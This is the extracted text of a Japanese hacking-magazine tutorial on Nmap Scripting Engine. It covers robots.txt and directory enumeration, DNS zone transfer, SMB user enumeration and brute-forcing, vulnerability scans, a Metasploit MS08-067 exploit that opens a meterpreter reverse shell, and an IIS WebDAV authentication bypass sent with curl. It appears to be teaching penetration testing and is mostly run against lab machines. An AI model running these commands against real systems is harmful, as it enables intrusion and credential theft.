hj-mook_P108.indd

Save this PDF as:
 WORD  PNG  TXT  JPG

Size: px
Start display at page:

Download "hj-mook_P108.indd"

Transcription

1 Find it! & Own it! まぜるな 危 険 のオンパレード NSE 文 TTS を 使 った 脆 弱 性 調 査 NSEはNmapを 単 なるポートスキャナーから 脆 弱 性 調 査 ツールへと 変 身 させる 機 能 拡 張 だ Metasploit Frameworkなどと 組 み 合 わせれば 最 強 のハッキングツールとなる 実 際 に 使 って みることでNmapの 新 たな 側 面 を 体 験 しよう はじめに ここでは Nmap Scripting Engine( 以 下 NSE) の 実 践 編 として ターゲットの 事 前 調 査 やパスワー ドクラック 脆 弱 性 のスキャンなど 実 例 を 挙 げな がら 紹 介 していこう NSE の 使 い 方 自 体 に 難 しい 点 はないため 基 本 となるコマンドを 理 解 してい れば 簡 単 に 利 用 することができるはずだ 実 践 例 によっては 調 査 から 攻 撃 の 過 程 で Nmap 以 外 のツール(Metasploit Framework など)を 使 用 したものも 含 まれているが 基 本 的 には スクリプ トの 使 用 例 のみを 簡 潔 に 紹 介 したものがメインだ 紙 幅 の 都 合 で 紹 介 できるスクリプトは 限 られて いる 今 回 紹 介 していないスクリプトなども 例 を 参 考 にしながら 試 してみると さらに 理 解 度 が 高 まるだろう なお 記 事 執 筆 時 のテスト 環 境 は クライア ントには BackTrack4 R2 を 使 用 しており ター ゲットとしてローカル に 設 置 した 脆 弱 性 の あ る Windows XP Professional/Windows 2003 Server(テスト 内 容 によっては 実 在 するサーバー) を 使 用 している 実 践 1 robots.txtで 指 定 される 巡 回 拒 否 ファイルをチェック 図 1 http-robots.txtの 実 行 nmap -p80 --script=http-robots. txt Starting Nmap 5.35DC1 ( ) at :01 JST Nmap scan report for co.jp ( ) Host is up (0.024s latency). 80/tcp open http robots.txt: has 1 disallowed entry _ /webadmin Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds ポート 80 を 指 定 して 実 行 した 例 http-robots.txt はデフォルトスキャ ン(-sC)でも 実 行 される サーチエンジンのロボットなど クロー ラーの 巡 回 を 制 御 するために 多 くの Web サ イトでは robots.txt を 設 置 している 信 頼 できるクローラーは この robots.txt の 記 述 に 従 って Web サイトへのアクセスを 行 う ため Web サイト 管 理 者 がクロールされる ことを 望 まないページは robots.txt に 記 載 していることが 多 い つまり Web サイト 管 理 者 側 でアクセスされたくないページが 列 挙 されているため 攻 撃 の 糸 口 として 使 える 可 能 性 があるわけだ NSE で は discovery カテゴリに httprobots.txt として 用 意 されている NSE の デフォルトでもスキャンされるが 図 1 はこ 120

2 PART1 脆 弱 性 発 見 の のスクリプトを 指 定 して 白 夜 書 房 のオフィシャル Web サイトをスキャンした 例 だ webadmin ディ レクトリが 巡 回 拒 否 に 設 定 されていることがわか る 同 様 に 実 際 に robots.txt をスキャンして ア クセスされたくないディレクトリなどを 調 査 してみ ると 設 置 されている Web アプリケーションが 把 握 できるケースもあるだろう http-enum は 一 般 的 な Web アプリケー ションやサーバーのディレクトリやファイルを 列 挙 して 表 示 するためのスクリプトだ インターネット ユーザーには 表 向 き 隠 されているコンテンツ 図 2 http-enumの 実 行 やアプリケーション 関 連 のデータを 探 すなど nmap -p80 --script=http-enum Web サイトの 調 査 に 役 立 つだろう デフォルトでスキャンされるディレクト リ ファイル は /usr/share/nmap/nselib/ data の http-fingerprints に 記 載 されてい る 具 体 的 には /backup/ ディレクトリや /admin/ ディレクトリなどである これら は 自 分 で 作 成 したものを script-args で 指 定 (http-enum.fingerprintfile)することも 可 能 だ 実 践 2 Webサーバーのフォルダやファイルを 列 挙 する また script-args では ベースパスの 指 定 もできるので 必 要 な 場 合 はターゲットの パスを 付 加 するようにしよう 図 2 は 白 夜 書 房 のサイトをスキャンした 例 である /icons/ や /manual/ フォルダ そして /login.php が 存 在 していることがわかる Starting Nmap 5.35DC1 ( ) at :18 JST Nmap scan report for co.jp ( ) Host is up (0.0039s latency). 80/tcp open http http-enum: /icons/: Icons and images /login.php: Login /manual/: Manual directory (apache) _ /robots.txt: Robots file Nmap done: 1 IP address (1 host up) scanned in 1.12 seconds ポート 80(-p80)を 指 定 して http-enum を 実 行 した 例 http-enum 以 下 に 結 果 が 表 示 されていることがわかるだろう 実 践 3 ターゲットのゾーン 情 報 を 入 手 して 攻 略 の 手 がかりとする ゾーン 転 送 は DNS サーバーのゾーン 情 報 (ド メインに 対 する 名 前 解 決 の 情 報 )を 他 のサーバー へ 転 送 して 同 期 するために 行 われる DNS サーバーは 安 定 した 稼 働 を 実 現 しなけ ればならず そのために 通 常 は 複 数 の DNS サー バーが 用 意 されている これらの DNS サーバー で 同 じゾーン 情 報 を 同 期 するためには マスター データを 保 管 するプライマリ DNS サーバーのゾー ン 情 報 をセカンダリ(スレイブ)DNS サーバーへ 複 製 する 手 段 が 必 要 であり ゾーン 転 送 とはこれ を 指 している ただし このゾーン 情 報 には クラッカー が 欲 しがるサーバーやネットワークの 構 成 と いったターゲットサーバーを 攻 略 するための 手 がかりとなる 情 報 が 含 まれている 場 合 が ある このため 通 常 はプライマリ DNS サー バーでゾーン 転 送 の 要 求 を 受 けるセカンダリ DNS を 登 録 し 第 三 者 からのゾーン 転 送 要 求 は 受 け 付 けないなどのセキュリティ 対 策 が 行 われている しかし こうした 設 定 が 的 確 でない 場 合 第 三 者 が DNS サーバーのゾーン 情 報 を 入 手 することが 可 能 となる(Wikipedia のように 一 般 にゾーン 情 報 を 公 開 しているケースもある) NSE では dns-zone-transfer でゾーン 情 報 をチェックすることができるので 実 際 に 試 して みることにしよう また BackTrack4 R2 を 使 用 図 3 hostコマンドでdnsサーバーをチェックする host -t ns hogecompany.com hogecompany.com name server ns1.hogedns01.net. hogecompany.com name server ns2.hogedns01.net. hogecompany.com の DNS サーバーが 列 挙 されたことがわかる 121

3 図 4 hostコマンドの-lオプションを 使 用 してDNSのゾーン 転 送 を 要 求 を 行 う host -l hogecompany.com ns1.hogedns01.net Using domain server: Name: ns1.hogedns01.net Address: #53 Aliases: hogecompany.com name server ns1.hogedns01.net. hogecompany.com name server ns2.hogedns01.net. hogecompany.com has address cpanel.hogecompany.com has address ftp.hogecompany.com has address localhost.hogecompany.com has address webdisk.hogecompany.com has address webmail.hogecompany.com has address whm.hogecompany.com has address Host hoge-shobo.co.jp.localdomain not found: 9(NOTAUTH) ; Transfer failed. ゾーン 転 送 要 求 に 成 功 するとターゲットの DNS 情 報 が 送 られてくる 図 5 dns-zone-transferの 実 行 例 nmap --script dns-zone-transfer --scriptargs dnszonetransfer.domain=hogecompany.com ns1. hogedns01.net -p53 Starting Nmap 5.35DC1 ( ) at :52 JST Nmap scan report for ns1.hogedns01.net ( ) Host is up (0.045s latency). 53/tcp open domain dns-zone-transfer: hogecompany.com SOA ns1.hogedns01.net mariangonzaga.gmail.com hogecompany.com MX hogecompany.com hogecompany.com NS ns1.hogedns01.net hogecompany.com NS ns2.hogedns01.net hogecompany.com A cpanel.hogecompany.com A ftp.hogecompany.com A localhost.hogecompany.com A mail.hogecompany.com CNAME webdisk.hogecompany.com A webmail.hogecompany.com A whm.hogecompany.com A CNAME _ hogecompany.com SOA ns1.hogedns01. net mariangonzaga.gmail.com Nmap done: 1 IP address (1 host up) scanned in 4.98 seconds DNS のゾーン 情 報 転 送 に 成 功 した 例 これで hogecomapny.com のネットワー ク 構 成 が 判 明 する しているのであれば Nmap を 利 用 しなくとも DNS Enum(dnsenum. pl)などでも 情 報 を 入 手 することが 可 能 だ host コマンドでターゲットの DNS サーバーを 調 査 はじめに host コマンドを 用 いて ターゲットの DNS サーバーを 調 査 す る ターゲットドメインの DNS サー バーは host -t オプション+ NS(リ ソースレコードに DNS サーバーを 指 定 )+ターゲットドメイン 名 でチェッ クできる ここでは host コマンド のオプションなどについての 解 説 は 割 愛 するので 詳 細 は man などで チェックしてほしい 実 行 すると 前 ページ 図 3 のよう に DNS サーバーの 一 覧 が 表 示 され るはずだ 続 いて この DNS サーバー から ターゲットドメインのゾーン 情 報 を 入 手 可 能 かチェックする( 実 在 す るサーバーであるため 修 正 した 仮 の ドメイン 名 としている) DDNS のゾーン 転 送 要 求 を 受 け 付 けるかチェックする 前 述 したように ほとんどの DNS サーバーでは 第 三 者 からの DNS の ゾーン 転 送 要 求 (AXFR)は 受 け 付 け ないが セキュリティ 設 定 の 甘 いター ゲットなどであれば 応 答 が 得 られ る 可 能 性 がある このため 表 示 された DNS サー バーの 結 果 を 元 に 続 けて host コ マンドの -l オプション を 使 用 して DNS のゾーン 転 送 を 要 求 してみよう (-l オプション+ターゲットドメイン 名 + DNS サーバー) DNS のゾーン 転 送 要 求 を 受 け 付 け た 場 合 は 図 4 のように 結 果 が 表 示 さ れる hostコマンドでターゲット のDNSサーバーを 調 査 DNSのゾーン 転 送 要 求 を 受 け 付 けるかチェックする 122

4 PART1 脆 弱 性 発 見 の dns-zone-transfer を 実 行 する dns-zone-transferを 実 行 する チェックが で き たら Nmap の dns-zonetransfer を 実 行 してみよう 図 5 ではポート 53 と Arguments で --script-args dnszonetransfer. domain=< ドメイン 名 > を 追 加 して ターゲッ トドメイン 名 を 指 定 している 結 果 から ターゲットのサーバーやネットワー ク 構 成 などが 把 握 できれば 攻 略 の 糸 口 を 見 つ け 出 せる 可 能 性 が 出 てくるだろう NSE のスクリプトの 中 でも 有 用 と 言 えるもの に SMB 関 連 の ス クリプト が あ る SMB と は Server Message Block の 略 で Windows のネッ トワーク 共 有 で 使 われるプロトコルだ ここで は 実 用 的 な SMB スクリプトをいくつか 紹 介 し ていこう なお 記 事 では 主 に Windows マシン を 対 象 にしているが SMB をサポートしている Metasploitable に 対 しても 有 効 だ ユーザーの 一 覧 を 列 挙 する は じ め は smb-enum-users だ こ れ は ユーザーの 列 挙 を 行 うスクリプトで ターゲッ トのユーザー 名 を 簡 単 に 把 握 することができる Windows XP をスキャンした 例 が 図 6 である 結 果 として 表 示 されたユーザー 名 一 覧 は ユーザー 名 のみ に 整 形 したテキストファイルとして 保 存 しておけば THC-Hydra のようなブルー トフォース パスワードクラッキングツールで ユーザー 名 辞 書 として 利 用 できる NSE のブ ルートフォースアタックでも 同 様 にユーザー 名 として 指 定 できるが これについては 後 述 する 実 践 4 Windowsネットワーク 共 有 を 攻 略 する ユーザーの 一 覧 を 列 挙 する 共 有 されるファイルを 一 覧 表 示 共 有 されるファイルを 一 覧 表 示 次 に 同 様 にしてファイル 共 有 の 一 覧 を 列 挙 する smb-enum-shares を 利 用 してみよう 事 前 に ユーザー 名 パスワードを 把 握 して いるのであれば --script-args=smbuser=< ユーザー 名 >,smbpass=< パスワード > を 追 加 することで 次 ページ 図 7のように 該 当 ユー ザーでのファイル 共 有 状 況 の 結 果 をチェック することができる( 後 述 する smb-brute と 同 時 実 行 でも 同 様 ) これにより 該 当 ユー ザーの 共 有 状 況 ( 共 有 しているフォルダ 名 アクセス 権 など)も 調 査 できる 図 6 smb-brute でブルートフォースアタック 前 述 し た よ う に NSE で も smb-brute を 使 用 してのブルートフォースアタックは 可 能 だ NSE を 使 ったブルートフォースアタックに 関 して は 他 にも MySQL や PostgreSQL Microsoft SQL Server HTTP Basic 認 証 など 多 数 のスクリプト が 用 意 されているので smb-brute だけでなく ターゲットとして Metasploitable やクライアン トとして 利 用 している BackTrack などを 用 いてパ スワードクラックのテストをしてみるのもいいだ ろう smb-bruteでブルートフォースアタック p125 の 図 8 が 実 際 にクラックした 例 である --script-args=userdb=<ファイル 名 >,passdb=< ファイル 名 > を 追 加 して 指 定 して ユーザー 名 一 ターゲットを 指 定 してsmb-enum-usersを 実 行 nmap -p445 --script=smb-enum-users Starting Nmap 5.35DC1 ( ) at :41 JST Nmap scan report for Host is up (0.0011s latency). 445/tcp open microsoft-ds MAC Address: 00:0C:29:DE:D4:6C (VMware) smb-enum-users: USER01-B353585E\Administrator (RID: 500) USER01-B353585E\ASPNET (RID: 1004) USER01-B353585E\Guest (RID: 501) USER01-B353585E\HelpAssistant (RID: 1000) USER01-B353585E\IUSR _ USER01-B353585E (RID: 1005) USER01-B353585E\IWAM _ USER01-B353585E (RID: 1006) USER01-B353585E\SUPPORT _ a0 (RID: 1002) USER01-B353585E\test (RID: 1007) USER01-B353585E\user01 (RID: 1003) _ USER01-B353585E\user02 (RID: 1008) Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds smb-enum-users でユーザーの 一 覧 を 取 得 したところ ユーザー 自 身 が 作 った test user01 user02 があるのがわかる 123

5 図 7 ユーザー 名 パスワードを 指 定 してmb-enum-sharesを 実 行 する nmap -p445 --script=smb-enum-shares --script-args=smbuser=test,smbpass=test Starting Nmap 5.35DC1 ( ) at :34 JST Nmap scan report for Host is up ( s latency). 445/tcp open microsoft-ds MAC Address: 00:0C:29:DE:D4:6C (VMware) smb-enum-shares: ADMIN$ Type: STYPE _ DISKTREE _ HIDDEN Comment: Remote Admin Users: 0, Max: <unlimited> Path: C: WINDOWS Anonymous access: <none> Current user ('test') access: READ/WRITE C$ Type: STYPE _ DISKTREE _ HIDDEN Comment: Default share Users: 0, Max: <unlimited> Path: C: Anonymous access: <none> Current user ('test') access: READ/WRITE IPC$ Type: STYPE _ IPC _ HIDDEN Comment: Remote IPC Users: 1, Max: <unlimited> Path: Anonymous access: READ <not a file share> Current user ('test') access: READ <not a file share> test Type: STYPE _ DISKTREE Comment: Users: 0, Max: <unlimited> Path: C: test Anonymous access: <none> Current user ('test') access: READ test2 Type: STYPE _ DISKTREE Comment: Users: 0, Max: <unlimited> Path: C: Documents and Settings user01 xc7 xb9 xaf xc8 xc3 xd7 test2 Anonymous access: <none> _ Current user ('test') access: READ Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds ユーザー 名 =test パスワード =test を 指 定 してのスキャン 結 果 test ユーザーの 共 有 状 況 などが 確 認 できる 覧 のテキストファイルを 読 み 込 んでいる ターゲットシステム 情 報 の 表 示 ターゲットシステム 情 報 の 表 示 ターゲットであるWindows ユーザーのパスワー ドクラックに 成 功 したら そのアカウントを 用 い て ターゲットのシステム 情 報 を smb-systeminfo を 使 用 して 表 示 させてみよう smb-enum-shares の 時 と 同 様 に --script-args=smbuser=< ユーザー 名 >,smbpass =< パスワード > を 追 加 して 指 定 する 紙 幅 の 都 合 で 実 行 例 は 割 愛 させていただくが ターゲッ トマシンの 情 報 が 表 示 されるはずだ インストー ルされている OS の 種 類 や CPU 情 報 ブラウザー の 種 類 といった 情 報 を 確 認 することができる( 管 理 者 権 限 のユーザーの 場 合 ) また 記 事 ではわかりやすくするよう PC を 1 台 ずつ 指 定 してスキャンしているが 当 然 ながら 複 数 台 のマシンをスキャンしたり スクリプトを 連 続 して 指 定 するなど 応 用 的 な 使 い 方 も 可 能 なので 読 者 なりに 組 み 合 わせて 使 ってみるとよいだろう 124

6 PART1 脆 弱 性 発 見 の 図 8 ユーザー 名 パスワードの 辞 書 を 使 ってsmb-bruteを 実 行 nmap -p445 --script=smb-brute --script-args=userdb=test. txt,passdb=test.txt Starting Nmap 5.36TEST3 ( ) at :27 JST Nmap scan report for Host is up (0.0010s latency). 445/tcp open microsoft-ds MAC Address: 00:0C:29:DE:D4:6C (VMware) smb-brute: guest:<blank> => Login was successful test:test => Login was successful user01:test => Login was successful _ user02:test => Login was successful Nmap done: 1 IP address (1 host up) scanned in 0.67 seconds ユーザー 名 とパスワードのそれぞれに 辞 書 を 指 定 してスキャンした 例 ターゲットは 図 7と 同 じものを 使 用 している 追 加 でアカウン トがクラックされていることがわかる 実 践 5 NSEを 利 用 してターゲットの 脆 弱 性 を 調 査 する これまでは NSE を 使 ったターゲットの 事 前 調 査 などをメインに 紹 介 してきたが ここからは NSE の vuln カテゴリに 属 するスクリプトを 使 用 する 例 として ターゲットの 選 定 ~ 脆 弱 性 スキャ ン そしてアタックを 行 うまでの 一 例 を 流 れに 沿 っ て 解 説 していこう 取 り 上 げ る NSE スクリプト は smb-checkvulns と http-iis-webdav-vuln の 2 つである なお ここからのターゲットは Windows OS と なるため テストは 記 事 と 同 じ 脆 弱 性 を 持 つ 環 境 を 構 築 した 上 で 行 ってほしい ターゲットの 脆 弱 性 をチェックする ターゲットの 脆 弱 性 をチェックする smb-check-vulns では MS や MS Conficker(マルウェア)への 感 染 など 合 計 6 つ のチェックができるようになっている はじめに 答 えを 言 ってしまっては 面 白 味 には 欠 けるのだが ここでは smb-check-vulns でチェッ クできる 脆 弱 性 の 中 でも( 現 状 では) 最 もヒット 率 が 高 そうなものとして MS08-067(Server サー ビスの 脆 弱 性 ) 1 を 取 り 上 げることとした 具 体 的 な 手 順 としては ターゲットネットワー ク 上 でのターゲット 選 定 から 実 際 に 脆 弱 性 を 突 い たアタックまでである もちろん ここで 紹 介 す る 手 法 以 外 にもやり 方 はいくつも 考 えられるので あくまでも 一 例 として 見 てほしい smb-os-discoveryを 実 行 して 詳 しいOS 情 報 を 入 手 する smb-os-discoveryを 実 行 して 詳 しいOS 情 報 を 入 手 する ターゲットの 調 査 や 攻 撃 の 方 法 としては 最 初 に ping sweep(-sp オプション)を 実 行 してター ゲットの 選 定 をしたり OS Detection(-O オプショ ン)を 実 行 してホストのポートの 開 閉 状 況 や OS のチェックをしたりするのが 一 般 的 だ ただし 今 回 の 記 事 で は 紙 幅 の 都 合 から NSE を 使 い OS の 詳 しい 情 報 を 得 ることとした い -O オプションでは ターゲットの OS はいく つかの 候 補 が 提 示 されるに 止 まるが smb-osdiscovery ならばさらに 絞 り 込 んだ 結 果 を 返 して くれる 次 ページの 図 9 は Windows と 思 われる 2 台 の マシンに smb-os-discovery を 実 行 した 結 果 だが が Windows XP が Windows Server 2003 Build 3790 Service Pack 2 ということがわかった こうして 情 報 を 絞 り 込 めば 先 述 の SMB 関 連 の NSE スクリプト smb-enum-users や smbbrute を 併 用 してアカウントをクラックするなど 攻 略 の 幅 をさらに 広 げることができるだろう 1 マイクロソフト セキュリティ 情 報 MS

7 図 9 smb-os-discoveryを 実 行 して 詳 細 なOS 情 報 を 入 手 する nmap -p445 --script=smb-os-discovery Starting Nmap 5.35DC1 ( ) at :37 JST Nmap scan report for smb-os-discovery: OS: Windows XP (Windows 2000 LAN Manager) OS Name: WORKGROUP\USER01-B353585E _ System time: :37:25 UTC+9 Nmap scan report for smb-os-discovery: OS: Windows Server Service Pack 2 (Windows Server ) OS Name: WORKGROUP\VOENMEH-D0F286A _ System time: :37:25 UTC+3 Nmap done: 2 IP addresses (2 hosts up) scanned in 2.03 seconds smb-os-discovery の 実 行 例 -O オプションを 使 うよりもさらに 詳 しい OS 情 報 を 得 ることができる smb-check-vulnsを 実 行 して ターゲットの 脆 弱 性 を 調 査 smb-check-vulnsを 実 行 してターゲットの 脆 弱 性 を 調 査 さて ここでお 待 ちかねの smb-check-vulns が 登 場 する ターゲットの 脆 弱 性 調 査 を 行 うのだ 読 者 からの じゃあはじめから Nmap の smbcheck-vulns でスキャンすればいいじゃない と いう 声 も 聞 こえそうだが それも 当 然 アリだろう 今 回 の 例 でいえば ping sweepやsmb-osdiscoveryなどでのos 情 報 の 入 手 はすっ 飛 ば して nmap -p445 --script=smb-check-vulns * と 実 行 しても 脆 弱 性 のある Windowsマシンの 選 定 はできる しかし 事 前 調 査 をしておくことで ターゲッ トネットワーク 上 の 他 のターゲット( 例 えば Linux など)があるかどうかも 把 握 できるため より 多 くのターゲットを 選 定 できる 可 能 性 も 出 てくる 今 回 選 定 した 2 台 のターゲットをスキャンし た 結 果 が 図 10 である いずれのターゲットも MS08-067: VULNERABLE つ ま り MS の 脆 弱 性 が 放 置 されている 状 況 という 結 果 と なった Metasploit Frameworkを 使 用 して 脆 弱 性 を 突 く Metasploit Frameworkを 使 用 して 脆 弱 性 を 突 く スキャン 結 果 からターゲットに MS の 脆 弱 性 があることがわかったら 次 にその 脆 弱 性 を 突 いてターゲットに 侵 入 する ここでは Metasploit Framework を 使 用 した 例 を 示 す Metasploit Framework は p140 から 詳 細 に 解 説 されているので 単 に MS の Exploit を 実 行 する 手 順 のみを 紹 介 しておこう( 図 11) 攻 撃 が 成 功 すればセッションが 開 くので 結 果 はすぐにわかるはずだ これで Nmap を 使 用 し た MS の 攻 略 のシナリオはゲームオーバー となる Metasploitのautopwnで 攻 撃 を 自 動 化 Metasploit の Autopwn で 攻 撃 を 自 動 化 今 回 のような 攻 撃 は Metasploit の autopwn を 使 用 して 簡 単 に 行 うことも 可 能 だ ペネトレー ションテストの 自 動 化 ツール Fast-Track を 使 え ばよい BackTrack4 R2 の Penetration メニ ュー か ら Fast-Track Interactive を 選 択 して 簡 単 な 設 定 を 行 えば 自 動 的 に 脆 弱 性 へのアタックが 行 わ 126

8 PART1 脆 弱 性 発 見 の れ 成 功 すればセッションが 開 く 実 行 している 内 容 は Metasploit の autopwn と 全 く 同 じことだが Fast-Track では 単 純 にター ゲットを 指 定 する 程 度 の 作 業 で 完 了 してしまうた め 誰 でも 簡 単 に 攻 撃 できてしまう コマンドラ インが 苦 手 なユーザーであれば Armitage(p166 ~)を 利 用 してみるといいだろう いうまでもな いが こうしたツールを 自 分 が 管 理 していないサー バーやコンピューターへ 向 けて 実 行 しないよう 注 意 してほしい 図 10 smb-check-vulnsでターゲットの 脆 弱 性 をスキャン nmap -p445 --script=smb-check-vulns Starting Nmap 5.35DC1 ( ) at :15 JST Nmap scan report for Host is up ( s latency). 445/tcp open microsoft-ds MAC Address: 00:0C:29:DE:D4:6C (VMware) smb-check-vulns: MS08-067: VULNERABLE Conficker: Likely CLEAN regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) SMBv2 DoS (CVE ): CHECK DISABLED (add '--script-args=unsafe=1' to run) MS06-025: CHECK DISABLED (remove 'safe=1' argument to run) _ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run) Nmap scan report for Host is up (0.0010s latency). 445/tcp open microsoft-ds MAC Address: 00:0C:29:20:81:67 (VMware) smb-check-vulns: MS08-067: VULNERABLE Conficker: Likely CLEAN regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run) SMBv2 DoS (CVE ): CHECK DISABLED (add '--script-args=unsafe=1' to run) MS06-025: CHECK DISABLED (remove 'safe=1' argument to run) _ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run) Nmap done: 2 IP addresses (2 hosts up) scanned in 1.90 seconds いずれのターゲットも MS の 脆 弱 性 が VULNERABLE となっていることがわかる 図 11 Metasploit Frameworkを 使 ってMS08-067の 脆 弱 性 を 突 く (_) _ '_ ` _ \ / _ \ / _` / '_ \ / _ \ / (_ \ \ _) (_) _ _ _ _ \ \ \,_ /. / _ \ / _ \ _ =[ metasploit v3.6.0-dev [core:3.6 api:1.0] =[ 642 exploits auxiliary =[ 216 payloads - 27 encoders - 8 nops =[ svn r11617 updated today ( ) 次 ページに 続 く 127

9 msf > search ms ms [*] Searching loaded modules for pattern 'ms08-067'... Exploits ======== Name Disclosure Date Rank Description windows/smb/ms08 _ 067 _ netapi great Microsoft Server Service Relative Path Stack Corruption msf > use windows/smb/ms08 _ 067 _ netapi ms08 _ 067 _ netapi set PAYLOAD msf exploit(ms08 _ 067 _ netapi) > show options Module options (exploit/windows/smb/ms08 _ 067 _ netapi): Name Current Setting Required Description RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/meterpreter/reverse _ tcp): Name Current Setting Required Description EXITFUNC thread yes Exit technique: seh, thread, none, process LHOST yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name Automatic Targeting msf exploit(ms08 _ 067 _ netapi) > exploit Exploit [*] Started reverse handler on :4444 [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:japanese [*] Selected Target: Windows XP SP2 Japanese (NX) [*] Attempting to trigger the vulnerability... [*] Sending stage ( bytes) to [*] Meterpreter session 1 opened ( :4444 -> :1130) at Sat Jan 22 06:23: meterpreter > sysinfo sysinfo Computer: USER01-B353585E OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: ja _ JP meterpreter > pwd pwd C: WINDOWS system32 search コマンドで 実 行 する Exploit を 検 索 し set コマンドでターゲットおよび Payload などを 設 定 する 最 後 にオプションを 確 認 した 上 で Exploit を 実 行 すればよい 図 は 侵 入 に 成 功 している 例 である 128

10 PART1 脆 弱 性 発 見 の 実 践 6 MS09-020の 脆 弱 性 を 調 査 続 い て http-iis-webdav-vuln を 利 用 し た 例 を 紹 介 し よう http-iis-webdav-vuln は MS の 脆 弱 性 をスキャンして 結 果 を 表 示 す るもので はじめに MS の 脆 弱 性 につい て 把 握 しておく 必 要 があるだろう マイクロソフトセキュリティ 情 報 には 以 下 のよう に 記 載 されている ことがわかる そこで NSE の http-headers を 実 行 してみる 結 果 が 図 12 である Server: Microsoft-IIS/6.0 と 表 示 されていることがわかるだろう また 先 ほどの smb-os-discovery によって OS は Windows Server Service Pack 2(Windows Server ) ということもわかっている 攻 撃 者 が 特 別 な 細 工 がされたHTTPリクエストを 認 証 を 必 要 とするWebサイトに 送 信 した 場 合 特 権 が 昇 格 される 可 能 性 があります これらの 脆 弱 性 により 攻 撃 者 により 許 可 する 認 証 の 種 類 が 指 定 されているIISの 構 成 が 回 避 される 可 能 性 があり ますが 特 定 のユーザーによりアクセスできるファ イルを 検 証 するファイルシステムベースのアクセス 制 御 リスト(ACL)のチェックが 回 避 されることは ありません これらの 脆 弱 性 が 悪 用 された 場 合 で も 攻 撃 者 の 行 動 はファイルシステムのACLにより 匿 名 ユーザーアカウントへ 与 えられた 許 可 の 範 囲 に 制 限 されます 簡 潔 に 言 えば 該 当 する OS で WebDAV を 使 用 しており かつ 脆 弱 性 がある 場 合 認 証 が 必 要 な 保 護 されたフォルダへ 攻 撃 者 が 細 工 がされた HTTP リクエストを 送 信 することで 認 証 なしでアクセスでき てしまうというものだ 脆 弱 性 のあるシステムは IIS5.0/5.1/ 6.0 および WebDAV が 有 効 なシステ ムである さらに 詳 細 な 情 報 は マ イクロソフトセキュリティ 情 報 2 を 参 照 してほしい http-headersで ターゲットを 選 定 する http-headersでターゲットを 選 定 する ここでは p125 からの MS の 脆 弱 性 調 査 の 続 きという 想 定 で ターゲットの 選 定 なども 前 述 の 記 事 を 参 照 しながら 読 み 進 めていただきたい ターゲットの 1 つ に ping sweep OS Detection を 実 行 すると ポート 80 が 開 いている http-iis-webdav-vuln で 脆 弱 性 を 調 査 する ターゲットが Windows Server IIS6.0 であるということで NSE の http-iis-webdavvuln を 実 行 してみよう 次 ページの 図 13 では シングルホストに 対 してスキャンしているが もちろんターゲットを * のように 範 囲 指 定 することも 可 能 だ 余 談 だが Metasploitable に 対 して httpiis-webdav-vuln を 実 行 すると スキャン 結 果 に は http-iis-webdav-vuln: ERROR: This web server is not supported. とこの Web サーバー はサポートしていないと 表 示 される 図 を 見 るとわかるように ターゲットである Windows Server 2003( )のスキャ ン 結 果 は WebDAV is ENABLED であり 脆 弱 図 12 http-headersの 実 行 例 http-iis-webdav-vulnで 脆 弱 性 を 調 査 する nmap -p80 --script=http-headers Starting Nmap 5.35DC1 ( ) at :16 JST Nmap scan report for Host is up ( s latency). 80/tcp open http http-headers: Content-Length: 1433 Content-Type: text/html Content-Location: Last-Modified: Fri, 21 Feb :48:30 GMT Accept-Ranges: bytes ETag: "05b3daec0d9c21:25c" Server: Microsoft-IIS/6.0 Web IIS X-Powered-By: ASP.NET Date: Sat, 22 Jan :16:46 GMT Connection: close _ (Request type: HEAD) MAC Address: 00:0C:29:20:81:67 (VMware) Web サービスを 提 供 しているプログラムが IIS6.0 だとわかる 2 マイクロソフト セキュリティ 情 報 MS

11 性 のあるフォルダ 名 についても 記 載 されている 脆 弱 性 を 突 いたアタックを 行 うには? MS の 脆 弱 性 は 攻 撃 者 が 特 別 な 細 工 がされた HTTP リクエストを 認 証 が 必 要 な Web サイトに 送 信 した 場 合 特 権 が 昇 格 される 可 能 性 図 13 脆 弱 性 を 突 いたアタックを 行 うには? http-iis-webdav-vulnの 実 行 例 nmap -p80 --script=http-iis-webdav-vuln Starting Nmap 5.35DC1 ( ) at :15 JST Nmap scan report for Host is up ( s latency). 80/tcp open http _ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /private, /webdav MAC Address: 00:0C:29:20:81:67 (VMware) Nmap done: 1 IP address (1 host up) scanned in 2.02 seconds と 説 明 されている に 対 してスキャンした 例 WebDAV is ENABLED と 表 示 されフォ ルダ 名 が 列 挙 されていることがわかる ターゲットの 場 合 先 ほど 実 行 した http-iiswebdav-vuln の 結 果 から Vulnerable folders discovered 以 下 にあるフォルダ(/private およ び /webdav)が 認 証 を 必 要 とするWebDAV のフォ ルダであるということがわかる 試 しにブラウザーでアクセスして みると 図 14 のように 認 証 を 求 めら れアクセスすることができない 脆 弱 性 のあるターゲットでは アクセ ス 時 の HTTP リクエストを /private から /% c0% afprivate(% c0% af+ フォル ダ 名 ) と Unicode-encoded string を 挿 入 する 形 でアクセスすれ ば 認 証 を 回 避 できる 例 えば /webdav ディレクトリ 内 に test.txt というファイルがあると 想 定 できるのであれば 図 15 のよう に curl コマンドを 利 用 すればアクセ スできる このテキストには hacker japan と 1 行 だけ 記 載 されている しかし このままでは 実 際 に 脆 弱 性 を 突 いてアクセスするには 保 護 されたフォルダの 中 身 がわからなけ ればならない 図 14 ない 図 15 ブラウザーでアクセスしたところ このように 認 証 を 求 められアクセスでき curlコマンドでファイルの 内 容 を 表 示 する curl -H "Translate: f" /%c0%afwebdav/test.txt Unicode-encoded string hacker japan HTTP リクエストに Unicode-encoded string を 挿 入 してアクセスした 例 保 護 フォ ルダの 内 部 のファイル 名 がわかっていれば アクセス 可 能 だ test.txt 内 部 に 記 述 されている hacker japan が 表 示 されていることがわかる WebDAVクライアントに パッチを 当 てて 脆 弱 性 を 突 く WebDAV 